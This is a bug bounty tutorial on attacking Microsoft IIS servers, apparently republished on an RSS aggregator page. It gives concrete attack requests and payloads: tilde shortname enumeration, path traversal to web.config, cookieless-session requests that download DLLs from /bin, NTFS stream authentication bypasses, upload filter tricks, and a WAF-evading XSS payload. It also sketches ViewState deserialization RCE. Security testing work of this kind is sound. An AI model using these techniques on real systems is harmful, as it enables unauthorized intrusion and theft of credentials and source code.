惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

F
Full Disclosure
V
Vulnerabilities – Threatpost
Attack and Defense Labs
Attack and Defense Labs
N
News and Events Feed by Topic
SecWiki News
SecWiki News
S
Security @ Cisco Blogs
Schneier on Security
Schneier on Security
B
Blog
TaoSecurity Blog
TaoSecurity Blog
The Last Watchdog
The Last Watchdog
H
Hacker News: Front Page
Hacker News - Newest:
Hacker News - Newest: "LLM"
博客园_首页
D
Docker
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Y
Y Combinator Blog
W
WeLiveSecurity
N
News and Events Feed by Topic
F
Fortinet All Blogs
PCI Perspectives
PCI Perspectives
WordPress大学
WordPress大学
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Recent Announcements
Recent Announcements
Forbes - Security
Forbes - Security
T
Tailwind CSS Blog
Hacker News: Ask HN
Hacker News: Ask HN
爱范儿
爱范儿
腾讯CDC
Last Week in AI
Last Week in AI
月光博客
月光博客
C
Cybersecurity and Infrastructure Security Agency CISA
P
Proofpoint News Feed
Help Net Security
Help Net Security
V
V2EX
C
Cyber Attacks, Cyber Crime and Cyber Security
C
CXSECURITY Database RSS Feed - CXSecurity.com
H
Heimdal Security Blog
L
LINUX DO - 最新话题
GbyAI
GbyAI
The Hacker News
The Hacker News
罗磊的独立博客
S
SegmentFault 最新的问题
H
Hackread – Cybersecurity News, Data Breaches, AI and More
博客园 - 【当耐特】
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
V2EX - 技术
V2EX - 技术
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
O
OpenAI News
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻

Hacker News: Best

Dubai police arrest airline worker after accessing private WhatsApp group madhadron - The seven programming ur-languages GitHub - smol-machines/smolvm: Tool to build & run portable, lightweight, self-contained virtual machines. I Measured Claude 4.7's New Tokenizer. Here's What It Costs You. Introducing Claude Design by Anthropic Labs It Is Time to Ban the Sale of Precise Geolocation The creative software industry has declared war on Adobe Isaac Asimov: The Last Question Newly unsealed records reveal Amazon’s price-fixing tactics, California attorney general claims Clojure - Documentary Android CLI and skills: Build Android apps 3x faster using any agent Qwen3.6-35B-A3B on my laptop drew me a better pelican than Claude Opus 4.7 Codex for almost everything Introducing Claude Opus 4.7 Qwen Studio The Future of Everything is Lies, I Guess: Where Do We Go From Here? YouTube now lets you turn off Shorts Burgers | マクドナルド公式 ChatGPT for Excel Ask HN: Who is using OpenClaw? Live Nation illegally monopolized ticketing market, jury finds Google Broke Its Promise to Me. Now ICE Has My Data. Open Source Isn't Dead. The Future of Everything is Lies, I Guess: New Jobs Unexpected €54k billing spike in 13 hours: Firebase browser key without API restrictions used for Gemini requests IPv6 – Google Your Backpack Got Worse On Purpose Good sleep, good learning, good life Fixing a 20-year-old bug in Enlightenment E16. Does Gas Town 'steal' usage from users' LLM credits & paid services to improve itself? Tell HN: Fiverr left customer files public and searchable Cybersecurity Looks Like Proof of Work Now Getting the Flock out Release OpenSSL 4.0.0 · openssl/openssl Internet será irrespirable los días de fútbol y otros deportes. Telefónica extiende los bloqueos a Champions, tenis y golf. Automate work with routines - Claude Code Docs The Future of Everything is Lies, I Guess: Work Thousands of rare concert recordings are landing on the Internet Archive — listen now What is jj and why should I care? Backblaze has quietly stopped backing up your data Cal.com Goes Closed Source: Why AI Security Is Forcing Our Decision | Cal.com - Scheduling Software for Online Bookings Codex Hacked a Samsung TV The Future of Everything is Lies, I Guess: Safety GitHub - sterlingcrispin/nothing-ever-happens: Polymarket bot that buys "No" on all non-sports markets. For entertainment only, mostly a meme. Make tmux Pretty and Usable - Ham Vocke Microsoft isn't removing Copilot from Windows 11, it's just renaming it Servo is now available on crates.io - Servo aims to empower developers with a lightweight, high-performance alternative for embedding web technologies in applications. We May Be Living Through the Most Consequential Hundred Days in Cyber History, and Almost Nobody Has Noticed All elementary functions from a single binary operator 奈拜提耶市 Seven countries now generate 100% of their electricity from renewable energy Pro Max 5x Quota Exhausted in 1.5 Hours Despite Moderate Usage Tell HN: docker pull fails in spain due to football cloudflare block Bring Back Idiomatic Design @adlrocha - How the "AI Loser" may end up winning Apple update turns Czech mate for locked-out iPhone user Cache TTL silently regressed from 1h to 5m around early March 2026, causing quota and cost inflation The peril of laziness lost AI Will Be Met With Violence, and Nothing Good Will Come of It Center for Responsible, Decentralized Intelligence at Berkeley The disturbing white paper Red Hat is trying to erase from the internet – OSnews The Future of Everything is Lies, I Guess: Annoyances 447 Terabytes per Square Centimetre at Zero Retention Energy: Non-Volatile Memory at the Atomic Scale on Fluorographane Show HN: Pardonned.com – A searchable database of US Pardons 20 Years on AWS and Never Not My Job Artemis II crew splashes down near San Diego after historic moon mission Molotov Cocktail Is Hurled at Home of Sam Altman, OpenAI’s CEO France to ditch Windows for Linux to reduce reliance on US tech On filing the corners off my MacBooks Installing every* Firefox extension Chimpanzees in Uganda locked in vicious 'civil war', say researchers linux/Documentation/process/coding-assistants.rst at master · torvalds/linux GitHub - callumlocke/json-formatter: Makes JSON easy to read. A compelling title that is cryptic enough to get you to take action on it GitHub - Keychron/Keychron-Keyboards-Hardware-Design: Industrial design files for Keychron keyboards and mice. 100+ models with CAD assets in STEP, DXF, DWG, and PDF. Source-available, with commercial use allowed for original compatible accessories within the license terms. [ANNOUNCE] WireGuardNT v0.11 and WireGuard for Windows v0.6 Released 1D-Chess Helium Is Hard to Replace FBI used iPhone notification data to retrieve deleted Signal messages Microsoft suspends dev accounts for high-profile open source projects Why you can’t trust Privacy & Security Serenity Forge (@serenityforge.com) A new trick brings stability to quantum operations OpenAI Backs Bill That Would Limit Liability for AI-Enabled Mass Deaths or Financial Disasters Netflix Prices Went Up Again – I Bought a DVD Player Instead DOJ Wants to Scrap Watergate-Era Rule That Makes Presidential Records Public EFF is Leaving X How NASA built Artemis II’s fault-tolerant computer Meta removes ads for social media addiction litigation How Pizza Tycoon simulated traffic on a 25 MHz CPU Claude mixes up who said what, and that's not OK Reallocating $100/Month Claude Code spend to Zed and OpenRouter Help Keep Thunderbird Alive! Why Are Flock Employees Watching Our Children? The Pentagon Threatened Pope Leo XIV’s Ambassador With the Avignon Papacy Fragments: April 2 Native Instant Space Switching on MacOS Bitcoin miners are losing $19,000 on every BTC produced as difficulty drops 7.8% God sleeps in the minerals Apple Silicon and Virtual Machines: Beating the 2 VM Limit
humiliating iis servers for fun and jail time
Miguel Llamazares · 2026-06-17 · via Hacker News: Best

· 13 minutes read

A friend of mine once told me:

If you ever spot an IIS blue screen, don’t stop there; there must be something.

Yep, he was right. That IIS splash page is not a dead end. Behind that blue window sits one of the most consistently misconfigured web servers on the www, and it’s begging you to look deeper.

So let me walk you through how I approach IIS targets during bug bounty:

table of contents

  • psst, psst, IIS servers, where are you?
    • shodan
    • google dorking
    • active tech fingerprinting
  • ok, I found an IIS server. now what?
    • internal IP disclosure
  • pwn time
    • nuclei templates: automate the boring stuff
    • the HTTPAPI 2.0 dead end that isn’t
    • IIS tilde enumeration: the gift that keeps giving
      • using LLMs
      • github dorks to resolve shortnames
      • using BigQuery to resolve shortnames
      • bruteforcing the rest with crunch
    • fuzzing: the IIS-specific wordlist matters
    • web.config: the keys to the kingdom
      • path traversal to web.config
      • bin directory DLL exposure via cookieless sessions
    • reverse proxy path confusion
    • authentication bypass via NTFS hacks
    • file upload tricks
  • bypassing WAFs via HPP

psst, psst, IIS servers, where are you?

Here are some techniques I use to find IIS servers.

shodan

Before you even touch a target, go see what Shodan already knows:

ssl:"target.com" http.title:"IIS"
ssl.cert.subject.CN:"target.com" http.title:"IIS"
org:"target" http.title:"IIS"

These sample queries will list IIS boxes tied to the target’s org or SSL certificates. You’ll sometimes find staging servers, forgotten admin panels, and internal tools that nobody realized were internet-facing.

Feel free to replace or combine shodan with other platforms like fofa, censys, netlas, odin, etc. They all index different slices of the internet. 🍕

google dorking

Google can find IIS servers for you before you even fire up a scanner. These dorks are all about locating IIS targets within a scope:

site:target.com intitle:"IIS Windows Server"
site:target.com inurl:aspnet_client
site:target.com ext:aspx | ext:ashx | ext:asmx
site:target.com intext:"Microsoft-IIS" | intext:"X-Powered-By: ASP.NET"
site:target.com inurl:_vti_bin
site:target.com intitle:"Microsoft Internet Information Services"

The aspnet_client folder and _vti_bin (FrontPage extensions) are dead giveaways for IIS; if Google has indexed them, you’ve got a target. The ext:aspx dork catches any indexed ASP.NET pages, which means IIS is underneath.

Also, expand your scope with stacked wildcards to catch nested subdomains that basic enumeration misses:

site:*.target.com intitle:"IIS"
site:*.*.target.com intitle:"IIS"

That second one has surfaced dev/staging boxes for me more than once.

active tech fingerprinting

The easiest way to know you’re staring at IIS is the response headers. Hit it with a raw request:

nc -v target.com 80

Or if it’s TLS:

openssl s_client -connect target.com:443

What you’re looking for something like this in the response headers:

Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET

But probably you want to do this at scale. Then just keep calm and use httpx (or nuclei):

httpx -l targets.txt -td | grep IIS | tee iis-targets.txt

ok, I found an IIS server. now what?

First off, let’s confirm what we’re dealing with and grab as much information as the server is willing to give away for free.

internal IP disclosure

Here’s a freebie most people miss. Send an HTTP/1.0 request to certain IIS setups (especially Exchange or OWA fronts) and the server will sometimes hand you an internal IP in the Location header:

curl -v --http1.0 http://example.com

You might get back something like:

HTTP/1.1 302 Moved Temporarily
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

That internal IP and that X-FEServer header just told you the internal hostname of the Exchange server. File that away. It’s information disclosure that we could leverage in the following steps.

pwn time

Enough recon by now, let’s get to the juicy parts.

nuclei templates: automate the boring stuff

Once you’ve got your list of IIS targets, blast them with nuclei using relevant tags:

nuclei -l iis-targets.txt \ 
    -tags microsoft,windows,asp,aspx,iis,azure,config,exposure -silent

I like to fire this in the background while I’m doing manual recon.

the HTTPAPI 2.0 dead end that isn’t

You’ll hit a lot of IIS boxes that respond with a generic HTTPAPI 2.0 404 error. Most people see this and think “nothing here.” Wrong.

What this actually means is the server didn’t receive the right domain name in the Host header. The IIS instance is there, it’s running something, but it’s bound to a specific virtual host. You need to figure out which one.

Two approaches:

  1. check the SSL certificate. The subject or SAN field often contains the hostname you need. Just hit it in a browser and inspect the cert.

  2. if the cert doesn’t help, you brute-force virtual hosts. Tools like ffuf with a Host header wordlist work well here:

    ffuf -u https://TARGET_IP/ -H "Host: FUZZ.target.com" -w vhosts.txt -fs 0

    When you land on the right hostname, the server suddenly wakes up and serves you a real application instead of that useless 404.

IIS tilde enumeration: the gift that keeps giving

This is, one of the most underrated techniques. IIS has a legacy behavior inherited from the old DOS 8.3 filename convention. By sending specially crafted requests, you can enumerate the short names of files and directories on the server even if directory listing is disabled.

The tool you want is shortscan:

shortscan https://target.com/ -F -p 1

Note -F -p 1 parameters tell shortscan to fuzz the directories (full urls) and enumerate the shortnames (-p stands for patience).

Another tool you can use is burp’s IIS Tilde Enumeration Scanner.

This will spit out shortname fragments like:

File: WEB~1.CON
File: GLOBAL~1.ASA
File: SITEBA~1.ZIP
Dir:  ADMIN~1

Now here’s the thing: WEB~1.CON is obviously web.config. But what’s SITEBA~1.ZIP? Is it sitebackup.zip? sitebase.zip? sitebatch.zip? If we can guess the full name, we can try to download it.

Let’s explore some options for wordlist generation:

using LLMs

Something like:

Return only a list of words, separated by newlines, and nothing else. Ensure that the words contain only alphanumeric characters.
Make a list of guesses, for what the rest of the word could be from this snippet. Ensure that the snippet is a substring of your guess. 
Make the list as extensive as possible.
Snippet: {shortname}

github dorks to resolve shortnames

GitHub’s code search is basically a free filename database. Millions of repos means millions of real-world filenames you can pattern-match against your shortname fragments. Way more effective than guessing blindly.

The idea: take the first 6 characters from your shortname (everything before ~1) and search GitHub for filenames that start with those characters and end with the right extension.

Using GitHub’s code search UI directly:

# In GitHub's search bar, select "Code" and use path: filters
path:/.ds_st
path:/global*.asa
path:/connec*.config

IIS Github dork

To pseudo-automate this, check out GSNW (GitHub Short Name Wordlist). You feed it your shortname fragments and it scrapes GitHub code search for matching filenames:

python gsnw.py "siteba" output.txt

There’s also GitHub-IIS-Shortname-Generator which does the same thing and outputs a clean wordlist:

python scanner.py WEBDEV

Found matches:
--------------------------------------------------
- WebDev.md
- WebDeveloper.java
- webdev.txt
- webdevicons.lua
--------------------------------------------------
Total unique matches: 86

Another cool option is shortnameguesser, which takes shortname scanner output and generates targeted wordlists by querying multiple sources to resolve the fragments.

using BigQuery to resolve shortnames

This is where it gets interesting. This technique is inspired by Assetnote’s research on using BigQuery to find hidden files on IIS. The idea is simple: use Google BigQuery’s public GitHub dataset to search the entire GitHub codebase for filenames that match your shortname pattern.

If your shortname scan returned SITEBA~1.ZIP, you run this in BigQuery:

SELECT DISTINCT path
FROM `bigquery-public-data.github_repos.files`
WHERE REGEXP_CONTAINS(path, r'(?i)(\/siteba[a-z0-9]+\.zip|^siteba[a-z0-9]+\.zip)')
LIMIT 1000

You’ll get back real filenames from real projects: sitebackup.zip, sitebase.zip, and so on. Now you have a focused wordlist instead of blindly guessing.

bruteforcing the rest with crunch

When LLMs, GitHub, and BigQuery all come up empty, sometimes you just need to go dumb and brute-force the remaining characters. crunch generates wordlists of every possible combination for a given character length:

crunch 4 6 abcdefghijklmnopqrstuvwxyz -o wordlist.txt

This generates every lowercase alphabetic string from 4 to 6 characters long. Since 8.3 shortnames show you the first 6 characters, you typically only need to guess the remaining portion.

Say shortscan gave you DESKTO~1.ZIP. You know the filename starts with deskto and ends with .zip. Now you need to figure out what comes after deskto. The file could be desktop.zip, desktopbackup.zip, desktop-files.zip, etc. Use ffuf with pattern-based fuzzing to cover the variations:

ffuf -w wordlist.txt -u https://target.com/desktoFUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop-FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop_FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop%20FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktopFUZZ.zip -mc 200,301,302,403

Note the different separators: hyphen, underscore, URL-encoded space, and no separator at all. Developers are inconsistent with naming conventions, so you want to cover all patterns. The %20 variant catches the surprisingly common case where someone named their file with a space in it — Windows doesn’t care, and IIS will serve it just fine.

This is the brute-force fallback when the smart approaches fail, and honestly, it works more often than you’d expect.

fuzzing: the IIS-specific wordlist matters

Generic wordlists are fine for generic servers. IIS is not generic. You need to fuzz for things that only exist in the IIS/.NET ecosystem.

These are high-value targets to fuzz for:

/web.config
/web.config.bak
/web.config.old
/web.config.txt
/global.asax
/trace.axd
/elmah.axd
/connectionstrings.config
/appsettings.json
/appsettings.Development.json
/appsettings.Staging.json
/appsettings.Production.json
/appsettings.Local.json
/secrets.json
/WS_FTP.LOG
/_vti_pvt/service.cnf

For instance, trace.axd is the ASP.NET trace viewer. If it’s enabled, you get full request/response logs including headers, cookies, and sometimes credentials. elmah.axd is the error log viewer; same deal. These are essentially debug endpoints that developers forget to turn off. 🫣

And always fuzz with IIS-specific extensions:

.asp,.aspx,.ashx,.asmx,.wsdl,.wadl,.config,.xml,.zip,.txt,.dll,.json

A practical ffuf command:

ffuf -u https://target.com/FUZZ -w iis-wordlist.txt \
     -e .asp,.aspx,.ashx,.asmx,.config,.json,.xml,.zip,.bak,.txt \
     -mc 200,301,302,403 -fs 0

Some IIS-specific wordlists that I like:

  • secLists IIS.txt: the classic. Covers default IIS paths, common handlers, and legacy files. Use it without adding extensions since the entries already include them.
  • orwa’s iis.txt: curated by Godfather Orwa (the same guy from the “THE POWER OF RECON” talk in the references below). Battle-tested on real bug bounty programs. This is the one I reach for first. 👑
  • orwa’s aspx.txt: companion to the above, focused specifically on .aspx endpoints.
  • wfuzz iis.txt: small but focused on known-vulnerable IIS paths.
  • dirbuster-ng iis.txt: another compact one that targets IIS-specific weaknesses.
  • Assetnote wordlists: auto-generated from real-world crawl data, updated monthly. Grab the ASP and ASPX wordlists. These are derived from actual production applications, so the hit rate is significantly better than generic lists.
  • OneListForAll: the “rockyou of web fuzzing.” Use onelistforallshort.txt for targeted runs and leave the full list running overnight.

pro tip

IIS is case-insensitive. If your wordlist is mixed-case, you’re wasting requests on duplicates. Use a lowercased wordlist like SecLists’ raft-medium-words-lowercase.txt or pipe your custom list through tr '[:upper:]' '[:lower:]' | sort -u before feeding it to ffuf.

web.config: the keys to the kingdom

If you can read web.config through a path traversal, a misconfigured backup file, or a shortname-assisted discovery, you’ve potentially won the entire engagement.

Here’s why: IIS web.config files often contain machine keys. These are the cryptographic keys used to sign and encrypt ViewState. If you have the machine keys, you can forge a malicious serialized ViewState payload and achieve remote code execution via deserialization.

This is one of the most reliable IIS RCE chains in existence. Tools like ysoserial.net will generate the payload for you once you have the keys. 🔑

path traversal to web.config

If you find any kind of file download or file read parameter, try stuff like:

GET /download?id=../../web.config
GET /download?id=..%2f..%2fweb.config

bin directory DLL exposure via cookieless sessions

Even without a path traversal, there’s a slick way to pull DLLs straight out of the bin directory. ASP.NET’s legacy cookieless session feature lets you embed a session token directly in the URL path using the (S(X)) syntax. The beautiful part: you can abuse this to confuse IIS’s path resolution and access the bin folder even when it should be blocked.

GET /(S(X))/b/(S(X))in/Newtonsoft.Json.dll

That URL looks like gibberish, but IIS interprets the (S(X)) segments as cookieless session tokens, strips them during path normalization, and ultimately resolves the path to /bin/Newtonsoft.Json.dll.

Now, Newtonsoft.Json.dll is a default library and won’t contain application secrets on its own. But the technique works for any DLL in the bin directory. If you’ve already enumerated filenames via tilde shortnames or other methods, swap in the actual application DLLs:

GET /(S(X))/b/(S(X))in/WebApplication1.dll
GET /(S(X))/b/(S(X))in/App_Code.dll
GET /(S(X))/b/(S(X))in/MyCustomAPI.dll

Download those, throw them into JetBrains dotPeek or dnSpy, and you’re reading the full decompiled source code: hardcoded credentials, API keys, internal endpoint logic, custom auth implementations; everything the developers thought was safely compiled away. 💀

reverse proxy path confusion

When IIS sits behind a reverse proxy (or acts as one), you can sometimes exploit path normalization differences to access paths you shouldn’t.

The classic trick: if /admin/ returns 403 or redirects you, try:

/anything/..%2fadmin/

The proxy sees /anything/..%2fadmin/ and thinks you’re requesting /anything/. It forwards the request. But IIS decodes %2f to /, resolves the path traversal, and serves /admin/. You just bypassed the access control.

authentication bypass via NTFS hacks

IIS 7.5 and similar versions have a fun behavior with NTFS alternate data streams and index allocation. You can sometimes bypass basic authentication with paths like:

/admin::$INDEX_ALLOCATION/admin.php
/admin:$i30:$INDEX_ALLOCATION/admin.php

These exploit how IIS resolves NTFS metadata streams. The authentication module sees a path it doesn’t recognize as protected, but the file system resolves it to the actual directory anyway.

file upload tricks

If you find an upload function on an IIS target, the developers almost certainly blacklisted .aspx and .asp. But IIS serves a surprising number of extensions as text/html by default, which means stored XSS through file upload.

Extensions that render as HTML (basic XSS vector works):

.cer
.hxt
.htm

Extensions that support XML-based XSS vectors:

.dtd, .mno, .vml, .xsl, .xht, .svg, .xml, .xsd,
.xsf, .svgz, .xslt, .wsdl, .xhtml

And IIS has a quirk with trailing dots in filenames. If the upload filter blocks shell.aspx, try:

shell.aspx.
shell.aspx..
shell.aspx...

IIS will strip the trailing dots and serve the file normally. This has been a known bypass for years and people still don’t filter for it. 🤷

For server-side includes, these extensions are worth trying:

.stm, .shtm, .shtml

bypassing WAFs via HPP

One last trick. If there’s a WAF in front of the IIS target blocking your payloads, HTTP Parameter Pollution (HPP) can sometimes split your payload across duplicate parameters:

https://target.com/page?param=<svg/&param=onload=alert(1)>

IIS and ASP.NET concatenate duplicate parameter values with a comma by default, which can reassemble your payload on the other side of the WAF.

bottom line

As we’ve seen, the attack surface of IIS in bug bounty is pretty wide but consistently under-tested. Everyone’s off chasing the latest js framework vuln while these windows boxes sit there, leaking internal IPs, serving up their own config files, and running with shortname enumeration wide open.

So don’t skip the blue screen. Recon harder. 🕵

further reading

There are some cool references I’ve collected thorought preparing this post:

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。